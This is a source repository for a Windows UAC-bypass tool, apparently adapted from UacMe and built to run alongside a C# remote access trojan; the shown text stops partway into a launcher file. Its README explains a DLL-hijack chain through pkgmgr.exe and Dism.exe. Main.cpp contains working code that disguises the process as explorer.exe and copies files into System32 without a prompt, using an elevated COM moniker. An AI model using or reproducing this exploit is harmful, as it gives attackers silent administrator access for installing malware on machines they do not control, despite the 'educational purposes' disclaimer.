├── .gitattributes ├── .gitignore ├── Bypass UAC.sln ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── LICENSE ├── README.md ├── copyFile ├── Main.cpp ├── copyFile.vcxproj ├── copyFile.vcxproj.filters └── ntos.h ├── testAnything ├── App.config ├── Launcher.csproj ├── Program.cs └── Properties │ └── AssemblyInfo.cs ├── testDll ├── Main.cpp ├── dismCore.cpp ├── testDll.vcxproj └── testDll.vcxproj.filters └── unattend.xml /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | Compiled/ 15 | [Dd]ebug/ 16 | [Dd]ebugPublic/ 17 | [Rr]elease/ 18 | [Rr]eleases/ 19 | x64/ 20 | x86/ 21 | bld/ 22 | [Bb]in/ 23 | [Oo]bj/ 24 | [Ll]og/ 25 | 26 | # Visual Studio 2015 cache/options directory 27 | .vs/ 28 | # Uncomment if you have tasks that create the project's static files in wwwroot 29 | #wwwroot/ 30 | 31 | # MSTest test Results 32 | [Tt]est[Rr]esult*/ 33 | [Bb]uild[Ll]og.* 34 | 35 | # NUNIT 36 | *.VisualState.xml 37 | TestResult.xml 38 | 39 | # Build Results of an ATL Project 40 | [Dd]ebugPS/ 41 | [Rr]eleasePS/ 42 | dlldata.c 43 | 44 | # DNX 45 | project.lock.json 46 | project.fragment.lock.json 47 | artifacts/ 48 | 49 | *_i.c 50 | *_p.c 51 | *_i.h 52 | *.ilk 53 | *.meta 54 | *.obj 55 | *.pch 56 | *.pdb 57 | *.pgc 58 | *.pgd 59 | *.rsp 60 | *.sbr 61 | *.tlb 62 | *.tli 63 | *.tlh 64 | *.tmp 65 | *.tmp_proj 66 | *.log 67 | *.vspscc 68 | *.vssscc 69 | .builds 70 | *.pidb 71 | *.svclog 72 | *.scc 73 | 74 | # Chutzpah Test files 75 | _Chutzpah* 76 | 77 | # Visual C++ cache files 78 | ipch/ 79 | *.aps 80 | *.ncb 81 | *.opendb 82 | *.opensdf 83 | *.sdf 84 | *.cachefile 85 | *.VC.db 86 | *.VC.VC.opendb 87 | 88 | # Visual Studio profiler 89 | *.psess 90 | *.vsp 91 | *.vspx 92 | *.sap 93 | 94 | # TFS 2012 Local Workspace 95 | $tf/ 96 | 97 | # Guidance Automation Toolkit 98 | *.gpState 99 | 100 | # ReSharper is a .NET coding add-in 101 | _ReSharper*/ 102 | *.[Rr]e[Ss]harper 103 | *.DotSettings.user 104 | 105 | # JustCode is a .NET coding add-in 106 | .JustCode 107 | 108 | # TeamCity is a build add-in 109 | _TeamCity* 110 | 111 | # DotCover is a Code Coverage Tool 112 | *.dotCover 113 | 114 | # NCrunch 115 | _NCrunch_* 116 | .*crunch*.local.xml 117 | nCrunchTemp_* 118 | 119 | # MightyMoose 120 | *.mm.* 121 | AutoTest.Net/ 122 | 123 | # Web workbench (sass) 124 | .sass-cache/ 125 | 126 | # Installshield output folder 127 | [Ee]xpress/ 128 | 129 | # DocProject is a documentation generator add-in 130 | DocProject/buildhelp/ 131 | DocProject/Help/*.HxT 132 | DocProject/Help/*.HxC 133 | DocProject/Help/*.hhc 134 | DocProject/Help/*.hhk 135 | DocProject/Help/*.hhp 136 | DocProject/Help/Html2 137 | DocProject/Help/html 138 | 139 | # Click-Once directory 140 | publish/ 141 | 142 | # Publish Web Output 143 | *.[Pp]ublish.xml 144 | *.azurePubxml 145 | # TODO: Comment the next line if you want to checkin your web deploy settings 146 | # but database connection strings (with potential passwords) will be unencrypted 147 | #*.pubxml 148 | *.publishproj 149 | 150 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 151 | # checkin your Azure Web App publish settings, but sensitive information contained 152 | # in these scripts will be unencrypted 153 | PublishScripts/ 154 | 155 | # NuGet Packages 156 | *.nupkg 157 | # The packages folder can be ignored because of Package Restore 158 | **/packages/* 159 | # except build/, which is used as an MSBuild target. 160 | !**/packages/build/ 161 | # Uncomment if necessary however generally it will be regenerated when needed 162 | #!**/packages/repositories.config 163 | # NuGet v3's project.json files produces more ignoreable files 164 | *.nuget.props 165 | *.nuget.targets 166 | 167 | # Microsoft Azure Build Output 168 | csx/ 169 | *.build.csdef 170 | 171 | # Microsoft Azure Emulator 172 | ecf/ 173 | rcf/ 174 | 175 | # Windows Store app package directories and files 176 | AppPackages/ 177 | BundleArtifacts/ 178 | Package.StoreAssociation.xml 179 | _pkginfo.txt 180 | 181 | # Visual Studio cache files 182 | # files ending in .cache can be ignored 183 | *.[Cc]ache 184 | # but keep track of directories ending in .cache 185 | !*.[Cc]ache/ 186 | 187 | # Others 188 | ClientBin/ 189 | ~$* 190 | *~ 191 | *.dbmdl 192 | *.dbproj.schemaview 193 | *.jfm 194 | *.pfx 195 | *.publishsettings 196 | node_modules/ 197 | orleans.codegen.cs 198 | 199 | # Since there are multiple workflows, uncomment next line to ignore bower_components 200 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 201 | #bower_components/ 202 | 203 | # RIA/Silverlight projects 204 | Generated_Code/ 205 | 206 | # Backup & report files from converting an old project file 207 | # to a newer Visual Studio version. Backup files are not needed, 208 | # because we have git ;-) 209 | _UpgradeReport_Files/ 210 | Backup*/ 211 | UpgradeLog*.XML 212 | UpgradeLog*.htm 213 | 214 | # SQL Server files 215 | *.mdf 216 | *.ldf 217 | 218 | # Business Intelligence projects 219 | *.rdl.data 220 | *.bim.layout 221 | *.bim_*.settings 222 | 223 | # Microsoft Fakes 224 | FakesAssemblies/ 225 | 226 | # GhostDoc plugin setting file 227 | *.GhostDoc.xml 228 | 229 | # Node.js Tools for Visual Studio 230 | .ntvs_analysis.dat 231 | 232 | # Visual Studio 6 build log 233 | *.plg 234 | 235 | # Visual Studio 6 workspace options file 236 | *.opt 237 | 238 | # Visual Studio LightSwitch build output 239 | **/*.HTMLClient/GeneratedArtifacts 240 | **/*.DesktopClient/GeneratedArtifacts 241 | **/*.DesktopClient/ModelManifest.xml 242 | **/*.Server/GeneratedArtifacts 243 | **/*.Server/ModelManifest.xml 244 | _Pvt_Extensions 245 | 246 | # Paket dependency manager 247 | .paket/paket.exe 248 | paket-files/ 249 | 250 | # FAKE - F# Make 251 | .fake/ 252 | 253 | # JetBrains Rider 254 | .idea/ 255 | *.sln.iml 256 | 257 | # CodeRush 258 | .cr/ 259 | 260 | # Python Tools for Visual Studio (PTVS) 261 | __pycache__/ 262 | *.pyc 263 | -------------------------------------------------------------------------------- /Bypass UAC.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.26430.12 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "testDll", "testDll\testDll.vcxproj", "{62DFCCF4-6642-4A86-861F-04E25A7CEFC5}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "copyFile", "copyFile\copyFile.vcxproj", "{046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}" 9 | EndProject 10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Launcher", "testAnything\Launcher.csproj", "{56BAE5A3-B462-439F-ADF6-F98676A679C5}" 11 | EndProject 12 | Global 13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 14 | Debug|Any CPU = Debug|Any CPU 15 | Debug|x64 = Debug|x64 16 | Debug|x86 = Debug|x86 17 | Release|Any CPU = Release|Any CPU 18 | Release|x64 = Release|x64 19 | Release|x86 = Release|x86 20 | EndGlobalSection 21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 22 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Debug|Any CPU.ActiveCfg = Debug|Win32 23 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Debug|x64.ActiveCfg = Debug|x64 24 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Debug|x64.Build.0 = Debug|x64 25 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Debug|x86.ActiveCfg = Debug|Win32 26 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Debug|x86.Build.0 = Debug|Win32 27 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Release|Any CPU.ActiveCfg = Release|Win32 28 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Release|x64.ActiveCfg = Release|x64 29 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Release|x64.Build.0 = Release|x64 30 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Release|x86.ActiveCfg = Release|Win32 31 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5}.Release|x86.Build.0 = Release|Win32 32 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Debug|Any CPU.ActiveCfg = Debug|Win32 33 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Debug|x64.ActiveCfg = Debug|x64 34 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Debug|x64.Build.0 = Debug|x64 35 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Debug|x86.ActiveCfg = Debug|Win32 36 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Debug|x86.Build.0 = Debug|Win32 37 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Release|Any CPU.ActiveCfg = Release|Win32 38 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Release|x64.ActiveCfg = Release|x64 39 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Release|x64.Build.0 = Release|x64 40 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Release|x86.ActiveCfg = Release|Win32 41 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E}.Release|x86.Build.0 = Release|Win32 42 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 43 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Debug|Any CPU.Build.0 = Debug|Any CPU 44 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Debug|x64.ActiveCfg = Debug|x64 45 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Debug|x64.Build.0 = Debug|x64 46 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Debug|x86.ActiveCfg = Debug|Any CPU 47 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Debug|x86.Build.0 = Debug|Any CPU 48 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Release|Any CPU.ActiveCfg = Release|Any CPU 49 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Release|Any CPU.Build.0 = Release|Any CPU 50 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Release|x64.ActiveCfg = Release|x64 51 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Release|x64.Build.0 = Release|x64 52 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Release|x86.ActiveCfg = Release|Any CPU 53 | {56BAE5A3-B462-439F-ADF6-F98676A679C5}.Release|x86.Build.0 = Release|Any CPU 54 | EndGlobalSection 55 | GlobalSection(SolutionProperties) = preSolution 56 | HideSolutionNode = FALSE 57 | EndGlobalSection 58 | EndGlobal 59 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation. 6 | 7 | ## Our Standards 8 | 9 | Examples of behavior that contributes to creating a positive environment include: 10 | 11 | * Using welcoming and inclusive language 12 | * Being respectful of differing viewpoints and experiences 13 | * Gracefully accepting constructive criticism 14 | * Focusing on what is best for the community 15 | * Showing empathy towards other community members 16 | 17 | Examples of unacceptable behavior by participants include: 18 | 19 | * The use of sexualized language or imagery and unwelcome sexual attention or advances 20 | * Trolling, insulting/derogatory comments, and personal or political attacks 21 | * Public or private harassment 22 | * Publishing others' private information, such as a physical or electronic address, without explicit permission 23 | * Other conduct which could reasonably be considered inappropriate in a professional setting 24 | 25 | ## Our Responsibilities 26 | 27 | Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior. 28 | 29 | Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. 30 | 31 | ## Scope 32 | 33 | This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers. 34 | 35 | ## Enforcement 36 | 37 | Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at ghost@mcghost.ddns.net. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately. 38 | 39 | Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership. 40 | 41 | ## Attribution 42 | 43 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version] 44 | 45 | [homepage]: http://contributor-covenant.org 46 | [version]: http://contributor-covenant.org/version/1/4/ 47 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contribution 2 | **Thank you for considering contribution to the UAC Bypass Project!** 3 | ## How to contribute? 4 | It's very simple! 5 | 1. Fork the project 6 | 2. Make the changes 7 | 3. Issue a pull request 8 | 4. I will do a merge after verifying (in some cases changing) the code 9 | ## How to report bugs? 10 | You can simply use the *Issues* section on github 11 | Just write an issue, and i will try to respond within 24 hours! 12 | ## How to contribute? (without writing code) 13 | You can also do this on the *Issues* section, and i will label it as *enhancement* 14 | This way you can suggest new features, or change an older one without coding. 15 | I will try to respond within 24 hours! 16 | ## How to run / compile 17 | I use Visual Studio 2017 Community Edition. 18 | The c++ programs doesn't require .NET framework, the c\# Project is built with .NET Framework 4.5.2 19 | ## How to ask questions? 20 | You can also use the *Issues* section on GitHub, i will assign a label to it, so it's different from bugs. 21 | I will try to respond within 24 hours! 22 | You can also contact me at my [Youtube Channel](https://www.youtube.com/channel/UCYIOySp8zTTWJG5-n8wpZ2g) 23 | Either a comment on the video about the topic, or a message at the *Discussion* section on my channel page 24 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Advanced Hacker 101 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bypass UAC 2 | This project can bypass UAC on an administrator account with default UAC settings 3 | The project contains snippets from the UacMe project by hfiref0x, but formatted to work with the [c# R.A.T Client](https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client) 4 | ## Disclaimer 5 | This application is for educational purposes only. 6 | Using this tool without understanding how it's working can lead to negative consequences 7 | I'm not responsible for the consequences of using this tool! 8 | Only run it on a computer you have permission to! 9 | ## How it works 10 | The bypass has 2 main parts 11 | 1. Copy a fake dll to System32 12 | This can be done with IFileOperation 13 | 2. Execute the fake dll with Admin privs 14 | pkgmgr.exe with the `/n:` options calls Dism.exe which has dll hijacking vuln 15 | pkgmgr is an autoelevating .exe, it requires no uac prompt or admin privs, but runs on High IL 16 | The executing is done by running: `pkgmgr.exe /quiet /n:unattend.xml` 17 | After this the High IL Dll executes the R.A.T client with admin privs 18 | **testDll**: the fake DismCore.dll which will be copied to System32 19 | **testAnything**: a launcher, which executes the dll 20 | **copyFile**: copies a file to the destination, without the uac prompt 21 | 22 | ## System requirements 23 | ### On 32 bit (x86) Machine 24 | **x86 Release** build of testDll 25 | **x86 Release** build of testAnything 26 | **x86 Release** build of copyFile 27 | ### On 64 bit (x64) Machine 28 | **x64 Release** build of testDll 29 | **x64 Release** build of testAnything 30 | **x64 Release** build of copyFile 31 | 32 | The tool was tested on a Windows7 x64 bit machine 33 | The source code in this form only works with the c# R.A.T client, but you can modify it for your own project 34 | ## More Information 35 | You can read information related to contribution [here](https://github.com/AdvancedHacker101/Bypass-Uac/blob/master/CONTRIBUTING.md) 36 | You can read the Code of Conduct [here](https://github.com/AdvancedHacker101/Bypass-Uac/blob/master/CODE_OF_CONDUCT.md) 37 | You can view the project's licence [here](https://github.com/AdvancedHacker101/Bypass-Uac/blob/master/LICENSE) 38 | *Happy Coding* 39 | 40 | **-Advanced Hacking 101** 41 | -------------------------------------------------------------------------------- /copyFile/Main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "ntos.h" 6 | 7 | #define T_CLSID_FileOperation L"{3AD05575-8857-4850-9277-11B85BDB8E09}" 8 | static LPWSTR g_lpszExplorer = NULL; 9 | 10 | HRESULT elevateObject(void** fileOp) 11 | { 12 | HRESULT r = E_FAIL; 13 | BIND_OPTS3 bop; 14 | WCHAR szElevationMoniker[MAX_PATH]; 15 | DWORD dwClassContext = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER; 16 | 17 | RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker)); 18 | 19 | wcscpy(szElevationMoniker, L"Elevation:Administrator!new:"); 20 | wcscat(szElevationMoniker, T_CLSID_FileOperation); 21 | 22 | 23 | RtlSecureZeroMemory(&bop, sizeof(bop)); 24 | bop.cbStruct = sizeof(bop); 25 | bop.dwClassContext = dwClassContext; 26 | 27 | return CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, IID_IFileOperation, fileOp); 28 | } 29 | 30 | VOID NTAPI supxLdrEnumModulesCallback(_In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, _In_ PVOID Context, _In_ OUT BOOLEAN *StopEnumeration) 31 | { 32 | PPEB Peb = (PPEB)Context; 33 | 34 | if (DataTableEntry->DllBase == Peb->ImageBaseAddress) { 35 | RtlInitUnicodeString(&DataTableEntry->FullDllName, g_lpszExplorer); 36 | RtlInitUnicodeString(&DataTableEntry->BaseDllName, L"explorer.exe"); 37 | *StopEnumeration = TRUE; 38 | } 39 | else { 40 | *StopEnumeration = FALSE; 41 | } 42 | } 43 | 44 | VOID elevateProcess() 45 | { 46 | DWORD cch; 47 | PPEB Peb = NtCurrentPeb(); 48 | SIZE_T sz; 49 | WCHAR szBuffer[MAX_PATH * 2]; 50 | 51 | RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); 52 | cch = GetWindowsDirectory(szBuffer, MAX_PATH); 53 | if ((cch != 0) && (cch < MAX_PATH)) { 54 | 55 | wcscat(szBuffer, L"\\"); 56 | wcscat(szBuffer, L"explorer.exe"); 57 | 58 | g_lpszExplorer = NULL; 59 | sz = 0x1000; 60 | NtAllocateVirtualMemory(NtCurrentProcess(), (void **)&g_lpszExplorer, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 61 | if (g_lpszExplorer) { 62 | wcscpy(g_lpszExplorer, szBuffer); 63 | 64 | RtlEnterCriticalSection(Peb->FastPebLock); 65 | 66 | RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, g_lpszExplorer); 67 | RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, L"CustomString"); 68 | 69 | RtlLeaveCriticalSection(Peb->FastPebLock); 70 | 71 | LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)Peb); 72 | } 73 | } 74 | } 75 | 76 | int wmain(int argc, wchar_t* argv[], wchar_t *envp[]) 77 | { 78 | 79 | //Check Argument Count 80 | 81 | if (argc != 3) //Because the first arg is always the program name 82 | { 83 | std::cout << "Argument count mismatch!" << std::endl; 84 | return 1; 85 | } 86 | 87 | //Elevate Process 88 | 89 | elevateProcess(); 90 | 91 | //Define Vars 92 | 93 | LPWSTR sourceFile; 94 | LPWSTR destinationFile; 95 | IFileOperation *fileOperation; 96 | IShellItem *src, *dst; 97 | HRESULT result; 98 | DWORD OperationFlags; 99 | 100 | //Init vars 101 | 102 | result = E_FAIL; 103 | src = NULL; 104 | dst = NULL; 105 | fileOperation = NULL; 106 | OperationFlags = FOF_NOCONFIRMATION | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION; 107 | sourceFile = argv[1]; 108 | destinationFile = argv[2]; 109 | 110 | //Copy Operation 111 | result = CoInitialize(NULL); 112 | if (result != S_OK) return 1; 113 | std::cout << "COM Init Completed" << std::endl; 114 | result = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, IID_IFileOperation, (void **)&fileOperation); 115 | if (result != S_OK) return 1; 116 | std::cout << "Created COM Object" << std::endl; 117 | if (fileOperation != NULL) fileOperation->Release(); 118 | std::cout << "FileOp Released" << std::endl; 119 | result = elevateObject((void **)&fileOperation); 120 | if (result != S_OK || fileOperation == NULL) return 1; 121 | std::cout << "COM Object Elevated" << std::endl; 122 | fileOperation->SetOperationFlags(OperationFlags); 123 | std::cout << "Operation flags set" << std::endl; 124 | result = SHCreateItemFromParsingName(sourceFile, NULL, IID_IShellItem, (void **)&src); 125 | if (result != S_OK) return 1; 126 | std::cout << "Source shell item created" << std::endl; 127 | result = SHCreateItemFromParsingName(destinationFile, NULL, IID_IShellItem, (void **)&dst); 128 | if (result != S_OK) return 1; 129 | std::cout << "Destination shell item created" << std::endl; 130 | result = fileOperation->CopyItem(src, dst, NULL, NULL); 131 | if (result != S_OK) return 1; 132 | std::cout << "Copy operation scheduled" << std::endl; 133 | result = fileOperation->PerformOperations(); 134 | if (result != S_OK) return 1; 135 | std::cout << "All operations performed" << std::endl; 136 | src->Release(); 137 | dst->Release(); 138 | src = NULL; 139 | dst = NULL; 140 | fileOperation->Release(); 141 | fileOperation = NULL; 142 | 143 | std::cout << "FileOp and Shell items released" << std::endl; 144 | //system("PAUSE"); Debugging purposes only 145 | 146 | return 0; 147 | } -------------------------------------------------------------------------------- /copyFile/copyFile.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {046B3ADD-DF9B-4DAD-BD42-7875DD98F08E} 24 | Win32Proj 25 | copyFile 26 | 10.0.14393.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | 93 | 94 | Console 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | 108 | 109 | 110 | 111 | Level3 112 | 113 | 114 | MaxSpeed 115 | true 116 | true 117 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | 119 | 120 | Console 121 | true 122 | true 123 | %(AdditionalDependencies) 124 | 125 | 126 | 127 | 128 | Level3 129 | 130 | 131 | MaxSpeed 132 | true 133 | true 134 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 135 | 136 | 137 | Console 138 | true 139 | true 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | -------------------------------------------------------------------------------- /copyFile/copyFile.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /testAnything/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /testAnything/Launcher.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {56BAE5A3-B462-439F-ADF6-F98676A679C5} 8 | Exe 9 | testAnything 10 | testAnything 11 | v4.5.2 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | true 36 | bin\x64\Debug\ 37 | DEBUG;TRACE 38 | full 39 | x64 40 | prompt 41 | MinimumRecommendedRules.ruleset 42 | true 43 | 44 | 45 | bin\x64\Release\ 46 | TRACE 47 | true 48 | pdbonly 49 | x64 50 | prompt 51 | MinimumRecommendedRules.ruleset 52 | true 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | -------------------------------------------------------------------------------- /testAnything/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Diagnostics; 7 | 8 | namespace 